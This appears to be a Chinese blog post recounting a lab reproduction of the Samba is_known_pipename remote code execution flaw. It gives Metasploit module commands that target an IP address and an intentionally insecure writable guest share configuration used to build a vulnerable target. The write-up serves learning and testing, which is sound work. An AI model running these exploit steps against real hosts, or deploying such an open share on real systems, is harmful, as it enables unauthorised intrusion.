睡觉睡的正香,在梦里正在做一些不可描述的事情,就被一边的手机吵醒了,真的很想把手机砸掉,但是又舍不得,好几个月的工资呢。拿起来看了看。群里的大牛们开始讨论一个漏洞。曝漏洞了!还睡什么,起来测试了。
当我拿到这个漏洞的时候,做了大量的测试,攻击环境用的是Kali,靶机为ubuntu16.04、centos6.5等等。但是测试了一天,没有一次攻击成功,之前写了一篇关于这个漏洞的复现并提交到了嘶吼(编者注:并没有发布),到后面才发现,原来攻击的本地的docker镜像。
可以说成功么?当然不能,环境都是别人配置的,用别人配置的环境去复现显得多么的low啊。总之,各种环境失败,没有成功。看到了freebuf上的复现方法,讲真,真的不知道那个人在说什么。反正我还是不知道怎么复现的。各种环境测试也是失败的。
可以说进入正文了,先附上github的msf利用地址:点我
把它复制回来,或者用wget命令下载回来,移动到msf的目录中去
mv is_known_pipename.rb /opt/metasploit-framework/embedded/framework/modules/exploits/linux/samba/is_known_pipename.rb
之后查看本地ip,并打开metasploit
再看一眼靶机ip
执行reload_all,重新加载全部文件。
use exploit/linux/samba/is_known_pipename
Set rhost 192.168.12.104
Set target 3
按照别人说的方法,直接执行exploit就可以完成本次攻击,但是事实往往不是跟想象中的一样,
没有会话返回,我想了很久,换了各种环境来测试,但是很幸运,我一个都没有成功,无意之间想到了一个,本机测试。
直接攻击地址换成了kali的ip地址
set rhost 192.168.12.103
Set target 3
Exploit
很是神奇,但是还是没有想明白原因是什么
翻着国外的各大论坛,想着这个原因到底是什么,无意间翻到了推特上一个老外发的推文,说他成功了。
于是我就问他:“你的samba配置是怎么写的?”
老外:“一张图片”
但是我设置了这个配置仍然没有成功,我又问他:“我设置了跟你相同的配置,但是仍然没有成功”
老外:“exploit is working against 2:4.2.14+dfsg-0+deb8u5, does not work on 2:4.5.8+dfsg-1”
兄弟们,原谅我,我实在不知道这么怎么翻译了,我跟他交流都是靠着google翻译的。
虽然不是很明白老外的意思,但是连蒙带猜知道老外是想告诉我,我的版本是有问题的,但是不是samba的版本有问题。
我发现老外的攻击成功的系统是debian8.8,于是正准备安装debain的虚拟机,脑海里一个灵光,对调攻击机与靶机的攻防位置。简单说,就是用ubuntu去入侵kali。
攻击成功!
很多人纠结环境搭建这个东西,所以就在这里说一下。因为我也纠结了许久- -!攻击不成功,总是在怀疑是不是我samba环境搭建的有问题。
Ubuntu为靶机的环境:
sudo apt-get install samba
安装完成之后修改配置文件就行
sudo gedit /etc/samba/smb.conf
在文件末尾增加
[test]
path = /tmp
writeable = yes
browseable =yes
guest ok =yes
read only = no
create mask = 777
配置完成之后重启就好
sudo service smbd restart
Kali为靶机的环境:
Kali 默认是什么都有的,并不需要安装,直接添加配置文件,之后重启服务就行,不详细说明,参照ubuntu配置,其它类型的linux机器,参照ubuntu配置环境搭建
光是单单复现这样一个简单的漏洞,就用了一天,可以说是很要命的东西,可能我复现的这一天,全球ip就不知道被扫了多少遍了。还是慢了老外一步。关于这个漏洞的复现,我看很多,压根没有人写清楚到底是怎么回事,让我等小白一脸懵逼的看着那些大牛装B。反正人家不说,究竟是如何设置的。相信很多人已经看到了一些复现方法,但是,往往很多把我们的思路带到了死胡同里,在里面饶了好久也出不来,”人家明明有回话创建,我就是没有,怎么回事?”,反正我今天就被一篇文章带进去了,用一个不可能复现的环境,复现了实验,然后我伴随着他的思路走了好久。。。。
Qq群:617086434,这个漏洞的复现还有问题的可以在群里问,当然,没问题做别的技术交流也是没问题的,啊哈哈。只要你愿意来!
Docker复现方法:你真的要偷懒么
如若转载,请注明原文地址: http://www.4hou.com/technology/4983.html